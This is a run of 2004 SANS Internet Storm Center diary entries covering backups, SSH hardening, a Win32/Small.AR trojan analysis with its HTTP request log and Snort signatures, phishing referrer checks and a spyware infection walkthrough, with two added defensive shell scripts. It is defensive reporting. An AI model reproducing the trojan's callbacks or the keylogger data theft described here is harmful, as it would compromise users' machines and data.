Published: 2004-08-31

MTBF Blues

Sometime, somewhere, when you least expect it, you're going to find yourself sitting on the wrong side of those MTBF statistics. Trust me.

As packet nerds, sometimes it's easy for us to forget that all of these bit and bytes actually flow over hardware. And hardware has this nasty physicality about it, unlike the ephemeral world of packets and protocols. If you think facing the thought of your own mortality is a scary thing, then you don't even want to consider the consequences of that shiny new 7,200 RPM drive in your mailserver deciding to become a 0 RPM drive. Once again: trust me.

We all know the machines within our organization that we deem "business critical." But increasingly, as we all find ourselves piling more and more functionality onto existing equipment in order to stretch our IT budgets, there is a class of machines that don't quite make it to the "business critical" category but still carry enough of a load that their loss will cause you incredible headaches. I would place these machines in the "PITA" category, because it's a Pain In The A** if they die.

Last night, one of my PITA machines died. Because stress levels in the IT industry are high enough, rather than raise anyone's blood pressure with anticipatory angst, I'll clue you in right away: while the trip itself wasn't pretty, there is a happy ending: the machine is up and running again. Along the way, though, I learned a few things that I thought I'd pass along. Consider these "Rules of Thumb For Hardware Nightmares":

1) Rack mount machines look nice, no doubt about it, but they were never meant to be worked on. If the fellow who invented them were anywhere near me last night, he would be 1U high right now. Enough said.

2) Cables, once removed, will become so horribly entangled with each other, themselves, cables leading to other equipment, your shoestrings, cobwebs, belt loops, and, generally, anything longer than it is wide, that they will never again reach back to where they were originally placed.

3) Did I mention that I hate that rack-mount guy?

4) Backups are a good thing.

5) The final screw holding up a rackmount server is always possessed by demons. As is the first one you try putting in when putting the server back.

6) Shutting down a server to replace one component will cause several others to fail. One must assume that God has it in for IT people.

7) Backups are a very, very good thing.

8) You will always remember that you forgot to replace at least one cable AFTER you've tightened the last screw when placing the server back in the rack. Twice.

9) Perhaps God and the guy who invented rack mount servers are in cahoots.

10) Did I mention that backups are a good thing?

So Tom, what's the point? Well, aside from the fact that the Internet could have come to a flaming end sometime last night and I would have been too busy to notice... and thus I needed some "filler" for my diary... it's simply this: Check your backups. Make sure that you're backing up not just the "business critical" machines in your infrastructure, but also your PITA machines too. Make sure that your backups work. Make sure that you can RESTORE them when you need them.

Of all the problems and hassles and "issues" that I had breathing life back into my dead PITA server, the ONLY thing that went 100% smoothly was restoring from backup.

Now if you'll excuse me, I need to find my cable stretcher...


Handler on Duty : Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-08-30

Port 6346; Improved Signature for Trojan Win32/Small.AR; Clarification on SSH Advice for Repeated Hack Attempts

Port 6346

Several people wrote in today suggesting that the increase in traffic on tcp/6346 is due to increased Gnutella activity since many schools have started this week and more students are online with high-speed connections.

Improved Signature for Trojan Win32/Small.AR

nnposter submitted an additional Snort signature for the Win32/Small.AR trojan. He wrote:

"The following revision of the presented rule for Win32/Small.AR has substantially smaller processing overhead while generating fewer false positives:

alert tcp any any -> any 80 (msg:"Win32/Small.AR outbound activity"; flow:to_server,established; uricontent:"/zosman/cia/index.php"; classtype:trojan-activity; sid:5000824; rev:2;)

Further optimization can be achieved by replacing 'any' with $INTERNAL_NET and/or $EXTERNAL_NET but this would be dependent on deployment specifics."

Clarification on SSH Advice for Repeated Hack Attempts

In yesterday's diary, the suggestion was made that to reduce the amount of connection probes to your SSH daemon being made by the current series of automated scanners, you could configure it to listen on a non-default port.

Many folks wrote in today with opinions about "security through obscurity", indicating that they thought the recommendation was a bad idea.

If you look at the last paragraph of Bill's suggestion from yesterday, you will see he said:

"The above is aptly described as 'security through obscurity', and generally discouraged as the _sole_ protective measure for a system. Moving ssh to a different port doesn't absolve us from performing all the other security steps (patching, firewall, locking down ports, services and users, etc). It does make it harder for the casual prober, though, and that might be enough to handle the issue if the ISP won't."

We fully agree with everyone that there are many other improvements that can be made to better secure your SSH connections. Some of those improvements are:

- use tcp_wrappers/iptables/ipfw/etc to restrict who is allowed to connect to the port on which you are running sshd.

- set "PermitRootLogin no" in the sshd_config file to disallow people from logging in directly as root through an SSH connection.

- set "PasswordAuthentication no" in the sshd_config file to disallow the use of local passwords. This would require the use of SSH public/private keypairs or an additional two-factor authentication method.

- if you use local passwords, ensure that your users are using strong passwords.
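As an added example (not the ISC's or the OpenSSH project's own code), the following script audits an sshd_config against the settings listed above, and also reports whether sshd is still on the default port, the point Bill's quoted advice in the 2004-08-29 entry makes. It assumes OpenSSH's keyword semantics (the first uncommented occurrence of a keyword wins, so a later "PermitRootLogin no" does not override an earlier "yes"); it does not handle Match blocks, the "Keyword=value" spelling, or a port set through the Red Hat /etc/sysconfig/sshd OPTIONS line. The sample config it writes is constructed for the example.

```shell
#!/bin/bash
# Added example, not the ISC's or OpenSSH's code: audit an sshd_config against the
# hardening advice in the diary (PermitRootLogin no, PasswordAuthentication no) and
# report a default-port listener. Assumption: OpenSSH keyword semantics, where the
# first uncommented occurrence of a keyword wins; Match blocks and the
# "Keyword=value" spelling are not handled.

# Print the effective value of keyword $2 in config file $1 (lowercased), or
# "unset" when the keyword never appears uncommented, so the built-in default applies.
sshd_value() {
    awk -v k="$2" '
        tolower($1) == tolower(k) { print tolower($2); found = 1; exit }
        END { if (!found) print "unset" }' "$1"
}

# Print one line per deviation from the advice; prints nothing for a config that
# follows it. Exit status is always 0 so callers can pipe the output.
sshd_findings() {
    local cfg="$1" v
    v=$(sshd_value "$cfg" Port)
    if [ "$v" = "unset" ] || [ "$v" = "22" ]; then
        echo "Port: sshd is on the default port 22; automated scanners will find it"
    fi
    v=$(sshd_value "$cfg" PermitRootLogin)
    if [ "$v" != "no" ]; then
        echo "PermitRootLogin: is '$v'; set it to 'no' so root cannot log in directly"
    fi
    v=$(sshd_value "$cfg" PasswordAuthentication)
    if [ "$v" != "no" ]; then
        echo "PasswordAuthentication: is '$v'; set it to 'no' and use key pairs"
    fi
    return 0
}

# Constructed sample: a config that looks hardened at a glance but is not, because
# only comments mention the safe values and the risky PermitRootLogin comes first.
write_sample_sshd_config() {
    cat > "$1" <<'EOF'
# /etc/ssh/sshd_config (constructed sample for the example)
#Port 1011
PermitRootLogin yes
#PasswordAuthentication no
PermitRootLogin no
EOF
}

sample=$(mktemp)
write_sample_sshd_config "$sample"
echo "Findings for $sample:"
sshd_findings "$sample"
rm -f "$sample"
```

Run it against a real file with `sshd_findings /etc/ssh/sshd_config` after sourcing the script. The sample shows why reading the effective value matters: a commented-out "PasswordAuthentication no" changes nothing, and the second "PermitRootLogin no" loses to the first "yes".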


Published: 2004-08-29

Port 6346 increase; Mail bag: trojan Win32/Small.AR; SSH Advice for Repeated Hack Attempts

The past day has been pretty slow, with mainly the usual network noise. Here are some things of interest:

Port 6346 Increase

There has been an increase of traffic on this port, mainly in the number of sources and records. If anyone is seeing this and has any captures, please let us know.

trojan Win32/Small.AR

We would like to thank Chris Norton for his analysis of this trojan and for offering a Snort signature for it. He writes:

"Here we see Small.AR contacting 2 websites [members.chello.nl], [redirectf.dnsix.com]. As to what it was trying to do that remains a mystery as you will find out:

HTTP GET /zosman/cia/index.php HTTP/1.1
HTTP HTTP/1.1 404 Not Found (text/html)
HTTP GET /index.php? HTTP/1.1
HTTP HTTP/1.1 302 Found

the last request was followed by an ACK, FIN/ACK. All that was tried on was a GET /index.php? followed by a 302 and ACK, FIN/ACK.

Here in filemon we can see just what this trojan creates/touches:

[here it creates mssyncr.exe and writes data to it]
7:00:00 PM trojan.exe:720 CREATE C:\WINNT\System32\mssyncr.exe
SUCCESS Options: OverwriteIf Sequential Access: All

7:00:00 PM trojan.exe:720 WRITE C:\WINNT\System32\mssyncr.exe
SUCCESS Offset: 0 Length: 11820

7:00:00 PM trojan.exe:720 WRITE C:\WINNT\System32\mssyncr.exe
SUCCESS Offset: 0 Length: 12288

7:00:00 PM trojan.exe:720 WRITE C:\WINNT\System32\mssyncr.exe
SUCCESS Offset: 0 Length: 12288

other than the usual calls to the dll's needed to run the .exe that is all that was "suspicious"."

He also offers this Snort signature:

alert ip any any -> any any (msg:"Win32/Small.AR outbound activity"; uricontent:"/zosman/cia/index.php"; classtype:trojan-activity; sid:5000824; rev:1;)

SSH Advice for Repeated Hack Attempts

We have received numerous reports on the SSH scanning and brute force attempts. As such, fellow handler Bill Stearns offered some good advice to someone that was receiving continual scans and brute force attempts. I would like to pass along his response and hopefully it will help others. Also, if you've never checked out his website, you really should as there are lots of great resources! It can be found at

And now for some great advice from Bill:

"You're doing the right thing by reporting the scanner.
Unfortunately, if the ISP can't or won't remove the user's access, you're
left with the nagging question of "OK, the prober hasn't gotten in so far
because they don't have a valid username and password; what happens when
they get one?"
Might I suggest a distressingly simple way to avoid the probes?
Move your ssh servers to a different port. :-) This doesn't stop the
prober, but it gives you one more small roadblock for them; unless they're
specifically targeting you and decide to do a full portscan, they won't
find the ssh server.

If this is a remote box, I'd do this at a time when there are tech
people at your ISP so if something goes wrong you can set things back.
For your Internet accessible ssh servers, change the ssh port used. First, open 3 ssh connections to the box. That gives you some terminals on which to type if ssh doesn't restart or you can't get in for some reason. On Redhat/Fedora Linux, add the port number to the "OPTIONS" line in /etc/sysconfig/sshd :

[root@mysshserver root]# cat /etc/sysconfig/sshd

OPTIONS='-p 1011'

Once you've configured TCP wrappers and/or your firewall to allow incoming connections on the new port (allow traffic on port 22 as well until you're sure this still works), restart sshd:

/etc/init.d/sshd restart

The primary daemon will restart, but your existing ssh connections
on the old port 22 should stay open for emergencies.
On the client, (again, openssh, although nothing I describe here
is particular to openssh, Redhat/Fedora, or even Linux; all ssh clients
and servers can be convinced to use a different port), edit ~/.ssh/config
and add a block like this (substitute the real name of the machine for

Host mysshserver
Port 1011

Now run

ssh mysshserver

and you should be in. Use

ssh -v mysshserver

if you have trouble and need to debug.
Even programs like scp, sftp, and rsync-over-ssh will work just fine with no additional configuration; they all indirectly access ~/.ssh/config and use the port setting. Note that if you ever access this system by a different name (such as "mysshserver.whoevertech.com"), you'll want to add a similar ssh block starting with "Host mysshserver.whoevertech.com").

The above is aptly described as "security through obscurity", and
generally discouraged as the _sole_ protective measure for a system.
Moving ssh to a different port doesn't absolve us from performing all the
other security steps (patching, firewall, locking down ports, services and
users, etc). It does make it harder for the casual prober, though, and
that might be enough to handle the issue if the ISP won't."

1.gif Trojan - Update III

AV providers have provided updated signatures for the 1.gif email Trojan.

TrendMicro - Excellent analysis




Lorna J. Hutcheson

Handler on Duty



Published: 2004-08-28

New AV Updates; TEMPEST makes a comeback

McAfee releases update for 1.gif trojan

This trojan takes advantage of the exploits covered in Microsoft Security Bulletin MS03-032 or Microsoft Security Bulletin MS03-040. McAfee notes that if these patches are applied, you are immune from this virus. McAfee will still identify the trojan with the latest updates applied.

Compromising Emanations - a new study on an old technique

Markus G. Kuhn has done a study of compromising emanations, or TEMPEST, and it is worth discussing a bit here. This is the technique of using signals emanating from computer and communications equipment for the purpose of eavesdropping. It is not the first study that has been done; this has been an area of interest for the Government for almost 50 years. Over time they have used many different approaches to combat compromising emanations, including shielding, signal separation, and isolation techniques. Today's signaling and communications equipment, as opposed to what existed 25 years ago, uses much lower voltage levels for the processing of the signal. The trend for TEMPEST defense waned a bit, with newer equipment being immune to the eavesdropping equipment of yesterday due to the extremely low voltages used for signal processing. However, with the advent of newer technologies developed to exploit today's equipment, TEMPEST is drawing attention once again. Mr. Kuhn's article demonstrates "how to make information emitted via the video signal more easily receivable, how to recover plaintext from emanations via radio-character recognition, how to estimate remotely precise video-timing parameters, and how to protect displayed text from radio-frequency eavesdroppers by using specialized screen drivers with a carefully selected video card." Today we are most concerned about protecting data from sources that directly access it. This is a new concept for a lot of administrators out there, and well worth the read. More than anything, it will introduce a new approach to data compromise.


Tony Carothers

Handler on Duty



Published: 2004-08-27

Cisco Telnet DoS Vulnerability / Suspicious GIF files being mailed? / Paranoia, the right dosage

Cisco Telnet DoS Vulnerability

Cisco released information about a vulnerability, advising their customers to protect themselves from an actively used technique that blocks network-based administrative connections to their devices.

We released an initial warning this morning, to allow those needing the extra time to plan for this one.

This vulnerability should not affect the data flowing through the router.

Read more:

Suggested defensive actions:

- upgrade

- filter telnet connections using access control lists

- remove telnet support and switch to ssh (highly recommended anyway)

Suspicious GIF files being mailed?

An increasing number of suspicious gif attachments to email are being reported to us.

The filenames 1.gif and 2.gif seem to be popular, but it looks like the exploit isn't in the gifs, but rather in the body of the message that tries to download from a -currently down- website.

The reports so far indicate Outlook warns about ActiveX permissions, but that might not be the case in all instances.

Our best preventive advice would be to disable preview panes in Outlook, keep anti-virus software up to date at all times, and perhaps consider returning email to plain text as much as possible, both when sending and receiving messages.

Paranoia, the right dosage

At the ISC we get all sorts of messages, what stood out today to me was the need for the right level of paranoia.

It seems to be hard for individuals and organizations to have the right dose of paranoia. E.g. when dealing with phishing scams, the individuals being targeted could use a lot more paranoia; even security experts every so often could use more paranoia and be warier of things happening to them.

From a security point of view, this might lead to a "can't have enough paranoia" statement.

That's where I think we need to disagree. I think that even in the information security world we need a point where we do trust our suppliers and partners to do the right thing.

The reasoning that leads to too much paranoia often also leads in the information security world to an imbalance between the 3 pillars information security is built on: Confidentiality, Integrity and Availability.
We shouldn't sacrifice all availability for a bit more confidentiality. In the end information security needs to support the business, not cripple it.

I include myself among those sometimes having the wrong level of paranoia, but knowing it allows you to correct it a bit faster.


Swa Frantzen


Published: 2004-08-26

The Prototype Still Works; Insider Threat Paper; More Keylogging; Translation

The Prototype Still Works

After nearly 35 years of continuous service (the first node on the ARPANET was connected on September 2nd, 1969 - anybody throwing a party one week from today?) the experimental prototype network still works. I say "prototype" in reference to a quote that I heard a friend of mine say at DARPA a few years ago concerning the Internet, "Perhaps now it is time to quit experimenting with the prototype and build the real thing." How true! Especially when you consider that today's Internet is largely built on protocols developed in the 1970s. As I tell my students in various SANS classes, we've got to start thinking toward the future and push hard for secure replacements for all of the Internet protocols, including infamous ones like TCP/IP. In 35 years when the 'net is 70, will we still be using SMTP, FTP, telnet, and countless other "ancient" protocols?

Insider Threat Paper

The CERT Coordination Center recently published an excellent paper on the insider threat facing banks and other financial institutions. This one is worth a read: http://www.cert.org/archive/pdf/bankfin040820.pdf

More Keylogging

We had yet another report of keystroke logging, most likely by a Russian group. The keylogger sends data to an FTP site located in the netblock. This block is assigned to an ISP in San Diego and they've been notified. Check your netflows for activity to this block and investigate if you find anything. Many of the keyloggers we are seeing are using FTP to transfer the captured data, so a simple Snort alert looking for outbound FTP connections or FTP commands might provide an early warning about a hijacked box.

Enough Translations, Thanks!

We really appreciate all of the people who sent in translations for what was found in Joe's computer (Follow the Bouncing Malware, part II, http://isc.sans.org/diary.php?date=2004-08-23 .) I think that we've got it nailed down now as:

"Hara Hara Mahadev !!!

tum agar badshah hai to hum eespeek ka yekka!"

Hara Hara Mahadev is a war cry used by Maratha Warriors of old days from the state of Maharashtra in India. One can equate that to the Ranger's Warcry ("Rangers Lead the Way!")

Literally translated, the second line means, "If you are King then I am Ace of Spades."

Thanks, BSD Guy for the translation that makes the most sense.

Marcus H. Sachs

Handler on Duty


Published: 2004-08-25

Outlook Express Weakness / Solaris Apache Bug / Winamp Exploitation / Translations / End of Internet / Social Engineering Story

Outlook Express Weakness

Today we received a report from Juha-Matti Laurio. He reported a flaw in Outlook Express 6 which may disclose the email addresses in the "BCC:" field to other recipients when a message is sent split into multiple parts (an option that is disabled by default).

This weakness was confirmed by our ISC Handler Lorna, who gave a simple and complete explanation:

"Just like fragmentation...only the first email from the fragmented original
message contains the Bcc list."

Juha-Matti also reported it to Secunia, which published an advisory about it with more details.

Reference: http://secunia.com/advisories/12376/

Solaris Apache Bug

Another interesting advisory from Secunia is about Multiple Vulnerabilities in Apache for Sun Solaris. "These vulnerabilities can be exploited to bypass certain security restrictions, cause a DoS (Denial of Service), or potentially compromise a vulnerable system."

Time to Patch!

Reference: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57628

Winamp Exploit used in the wild

We received information about a Winamp vulnerability being exploited. An exploit is already publicly available and is reported to be in use in the wild.

Reference: http://secunia.com/advisories/12381/

Translations

ISC Handler Tom Liston, in his diary on August 23rd, on the 'Follow the Bouncing Malware, Part II' topic, mentioned:

"...And some downright bizarre stuff:

Hara Hara Mahadev !!!

tum agar badshah hai to hum eespeek ka yekka!

(Would anyone care to enlighten me?)"

A reader sent the translation to us:

"This appears to be Hindi, the translation of which is approximately:

Illuminating, Illuminating Eminence!!!

If you are a king then accept a lesson of a bug!"


"Hara Hara Mahadev !!!

tum agar badshah hai to hum eespeek ka yekka!"

Green green big king!!!

If you are a king then we are Ace of (whatever eespeek is)

End of Internet

An update about 'The End of Internet' prediction came from VirusList website.

According to the VirusList website, some news agencies misinterpreted Kaspersky's words.

"...The story stems from brief comments made
yesterday at a press conference which was dedicated to cybercrime and the
problems of spam.

At this press conference, Kaspersky commented that the possibility of
terrorists using the Internet as a tool to attack certain countries was
a reality. As an example, he cited the fact that a number of Arabic and
Hebrew language websites contained an announcement of an 'electronic
jihad' against Israel, to start on 26th August 2004."

Reference: http://www.viruslist.com/eng/index.html?tnews=461517&id=2100900

Social Engineering

This is a little story about social engineering and what you could do to avoid future problems.

Average Joe's wife received a phone call about 7:00pm from an alleged employee of Joe's ADSL provider, offering a piece of software called SoS-Phone, to be installed on Joe's computer to enhance the internal network security, for a cost of only 1 dollar/month. For that, he had to arrange a visit to Joe's house to check the computer environment.

Average Joe's wife asked the guy to call later because she had to talk to her husband first and he wasn't there. Then she called her brother-in-law to ask about it, because Joe's brother works in the security department of the same phone company! :) She then discovered that there was no such product!

Possible usage of this attack:

- Install malicious software to steal credit card number, passwords...

- Use this to get into your home and rob your house

- ...

In this example, if she hadn't been lucky enough to have someone she could verify the story with, she could have followed some steps to identify such scams:

- Check with the company if such product really exists, using 800 numbers, internet...

- Ask for name and a phone number that you could call back and verify the credentials

- use your common sense

believe...this CAN happen...

I am Joe's brother and this happened yesterday...:)


Olympic Games 2004 Status: Brazil 2 Gold/ 1 Silver/ 2 Bronze

Handler on Duty: Pedro Bueno <bueno/AT/ieee.org>


Published: 2004-08-24

Submitting Malware - Unpatched IE Hole Being Exploited - eJihad or iHysteria?

Submitting Malware

ISC reader Chris Norton discovered an unknown binary in his C:\WINDOWS directory attempting to access the Internet last night. After a scan with an up-to-date virus scanner provided no salient information, Chris submitted the binary to the ISC, along with some preliminary analysis and supporting information. ISC handlers ran the code past numerous current antivirus products to no avail. The code was then submitted to antivirus vendors and analysis began.

The point to this story isn't the identification of the malware (a new variant in the Small Trojan/Downloader family) but the steps taken by Chris before submission. Chris did everything right, which made interaction with the ISC much more fruitful for all parties. We gladly accept all malware submissions (Tom Liston is looking for material for his upcoming novel "Malware and Me: A Love Story"), but by following a few simple guidelines, you can help us help you. [Cory, Cory, Cory... *I* know that when one uses a co-ordinate phrase as a subject, the proper form is, "Malware and I: A Love Story." Did Yul Brenner star in "The King and Me"? I think not... -TL]

1) Make sure to run the binary through *current* antivirus before submitting. Additionally, submitting the binary to a service like VirusTotal ( http://www.virustotal.com ) is a good way to get a multi-AV view of what exactly you've got your hands on.

2) Include as much relevant information as possible about the state this code was found in. This could include things like any actions that may have triggered the installation/execution, any system behavior that appears to be a result of this code, packet captures of traffic generated, any other files that appear to be related, etc.

3) If you're capable and willing, continue investigating on your own.* If nothing else, it's a great learning experience, and there's a good chance you'll be able to discover things the ISC won't, as you're in possession of the entire impacted machine, instead of a few small pieces. Keep the ISC informed of findings, though, if you do decide to investigate on your own - especially if you discover that it's some innocent program ten minutes after submitting it to us. ;)

*If you are acting as part of an organization with an established incident response policy, DO NOT investigate on your own. Your incident response team will likely be very upset at receiving freelance assistance.

Unpatched Internet Explorer Hole Being Actively Exploited

SP2 must have changed something in the Matrix, because I've got a case of deja-vu all over again! The ISC is receiving reports that a currently unpatched IE vulnerability ( discovered by http-equiv, details here: http://secunia.com/advisories/12321 ) is being actively exploited in the wild. If you run across this *on a fully patched box* please submit the offending URL and any dropped (dragged 'n' dropped in this case) malcode to the ISC.

e-Jihad Begins Thursday, Internet Predicted to Melt Down by Mid-day

You should probably start backing up that gig of gmail to local storage. According to a Russian news site, Kaspersky Labs states that terrorists will launch attacks which will paralyze the Internet this Thursday. This tragically coincides with two weeks of script kiddie attacks (which were scheduled to begin this past Sunday) aimed at disrupting the Republican national convention. In addition, many college students are back on campus this week, which provides the e-terrorists and i-subversives with a veritable candyland of insecure boxes on big pipes. Faced with this triple threat, our beloved Internet will surely fall.

The ISC would like to go out on a limb and predict that the Internet will not vaporize into a cloud of nothingness this Thursday, but if it does, it's been our pleasure to help stave off its inevitable annihilation this long.


Cory Altheide




Published: 2004-08-23

MS Help For SP2 Setup Problems, The Phishin' Hole, Follow the Bouncing Malware, Part II

NOTE: We have received reports that McAfee's antivirus product tags this page as containing "Exploit-MhtRedir.gen". The signature for McAfee is triggering on one of the dead-listings of JavaScript on this page. -TL

NOTE#2: I've changed "<>" to "[]" on some of the JavaScript tags to try to avoid the false positives. -TL

What to do for an SP2 "Uh oh…"

How to recover your computer if the WinXP SP2 Setup program is not completed successfully


Applies to:

* Microsoft Windows XP Professional Service Pack 2 (SP2)

* Microsoft Windows XP Home Edition Service Pack 2 (SP2)

* Microsoft Windows XP Media Center Edition Service Pack 2 (SP2)

* Microsoft Windows XP Tablet PC Edition 2005

(Thank you, Jack!)

Gather 'round the Phishin' Hole

If your business is a likely target for a phishing scam, what can you do besides sitting around, waiting to react to the next wave of scams that try to separate your customers from their money? How about taking a look at your weblogs for suspicious referrers?

Many of the phishing sites that we have seen use graphics that are loaded directly from their targets servers. Oftentimes, the site will also redirect a scammed visitor to the real website when the scam has run its course.

If you find a site that is referring to your servers for graphics, it should be a dead giveaway that someone out there probably has a hook in the water.

Watch the referrers on inbound connections to login pages. Create and maintain a database of known-good referrers and use it to remove legitimate references from your referrer logs, and check out the rest. Consider using server side rules to redirect referrals from known phishing sites to special pages explaining to customers that they may have been scammed and what they should be doing.

In all of the time that we've been watching these phishing scams happen, we have yet to see any target that is using the tools and information available to them in an effective way. Phishing scams are not going to go away. It's time that likely targets began to put some thought into limiting their damage.

(Thank you, Swa!)
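As an added example of the referrer check described above (this is not code from the diary or from any of the sites it mentions), the script below walks an access log in Apache "combined" format, keeps only requests for the login page or for site graphics, and prints every hit whose Referer host is not on a known-good list. The allowlist, the hostnames (reserved .test and .example names) and the log lines are all constructed for the example; the watched paths (/login and /images/) are an assumption you would replace with your own.

```shell
#!/bin/bash
# Added example, not from the diary: scan a web server access log in Apache
# "combined" format for requests to the login page or site graphics whose Referer
# host is neither our own site nor a known-good referrer. The allowlist, hostnames
# and log lines are constructed for the example (reserved .test/.example names).

# Referrer hosts allowed to link to our login page and graphics (assumed allowlist;
# the diary suggests keeping this as a database you maintain over time).
KNOWN_GOOD_REFERRERS="www.example-bank.test online.example-bank.test"

# Print "referrer_host<TAB>path<TAB>client_ip" for every request to a watched path
# (/login or anything under /images/) whose Referer host is not on the allowlist.
# Requests without a Referer are direct hits and tell us nothing, so they are skipped.
suspicious_referrers() {
    awk -v good="$KNOWN_GOOD_REFERRERS" '
    BEGIN { n = split(good, g, " "); for (i = 1; i <= n; i++) ok[g[i]] = 1 }
    {
        # Combined log: ip - - [time] "METHOD path proto" status bytes "referer" "agent"
        split($0, q, "\"")
        split(q[2], req, " ")
        path = req[2]; ref = q[4]
        if (path !~ /^\/(login|images\/)/) next
        if (ref == "-" || ref == "") next
        host = ref
        sub(/^[A-Za-z]+:\/\//, "", host)      # drop the scheme
        sub(/[\/:?#].*$/, "", host)           # drop path, port and query
        host = tolower(host)
        if (host in ok) next
        printf "%s\t%s\t%s\n", host, path, $1
    }' "$1"
}

# One line per offending referrer host with its hit count, most hits first.
referrer_summary() {
    suspicious_referrers "$1" | cut -f1 | sort | uniq -c | sort -rn
}

# Constructed sample log: two legitimate hits, two pulled in from a look-alike site,
# one direct hit with no Referer, and one hit on a page we do not watch.
write_sample_access_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [23/Aug/2004:10:15:02 -0400] "GET /images/logo.gif HTTP/1.1" 200 4312 "http://www.example-bank.test/" "Mozilla/4.0"
203.0.113.6 - - [23/Aug/2004:10:15:40 -0400] "GET /login HTTP/1.1" 200 1200 "https://online.example-bank.test/start" "Mozilla/4.0"
198.51.100.7 - - [23/Aug/2004:10:16:44 -0400] "GET /images/logo.gif HTTP/1.1" 200 4312 "http://secure-bank-verify.example/login.htm" "Mozilla/4.0"
198.51.100.9 - - [23/Aug/2004:10:17:01 -0400] "GET /login HTTP/1.1" 302 0 "http://secure-bank-verify.example/login.htm" "Mozilla/4.0"
192.0.2.44 - - [23/Aug/2004:10:18:30 -0400] "GET /login HTTP/1.1" 200 1200 "-" "Mozilla/4.0"
192.0.2.45 - - [23/Aug/2004:10:19:30 -0400] "GET /about.html HTTP/1.1" 200 800 "http://secure-bank-verify.example/" "Mozilla/4.0"
EOF
}

log=$(mktemp)
write_sample_access_log "$log"
echo "Suspicious referrers in $log:"
suspicious_referrers "$log"
echo "Per-host summary:"
referrer_summary "$log"
rm -f "$log"
```

On the sample, the two hits from secure-bank-verify.example are the only output: a site that is not yours, pulling your logo and then sending visitors to your login page, is exactly the "hook in the water" the text describes. The per-host summary is what you would review daily, adding genuinely legitimate hosts to the allowlist as you go.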

Follow the Bouncing Malware – Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.

Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I’m sorry it took so long to get this put together and up...

In case you missed Part I, or in case you simply want to review, here's a link to where we started:


Go on... I’ll wait.

Ready? Good.

When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.

That's when the fun began.

With an IFRAME here and a CHM exploit there, Joe Average’s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.

"Somebody Else’s PC."


Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they’re making all of Joe's bright and shiny hardware dance to a tune that THEY’RE playing.

You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...

When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:

1) Joe's homepage had been changed. It is now set to:


2) The default search page has been set to:


3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine (more on this later.)

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.

Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you’ll recall, it was a .cab file called "fr03tp.cab," containing two files:

ATPartners.inf – 403 bytes

ATPartners.dll – 96,256 bytes

(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)

Looking at the strings contained within the .dll file, we find some interesting stuff:

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

And some downright bizarre stuff:

Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!

(Would anyone care to enlighten me?)

Putting some obvious "stuff" from that list together, we get ourselves a URL:


where we find the following interesting message:


Name=Gamehouse Games

Name=Big Fish Games

Name=FlyorDie Games




(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)

Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.

SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:

Drop#1 – 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).

Drop#2 – 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).

ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:

Drop#1 – 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."

Drop#2 – 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com), whose stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.

Drop#3 – 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.

So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he’ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn’t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.

But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?


Next time around, we’re going to download a DIFFERENT set of "configuration" instructions:









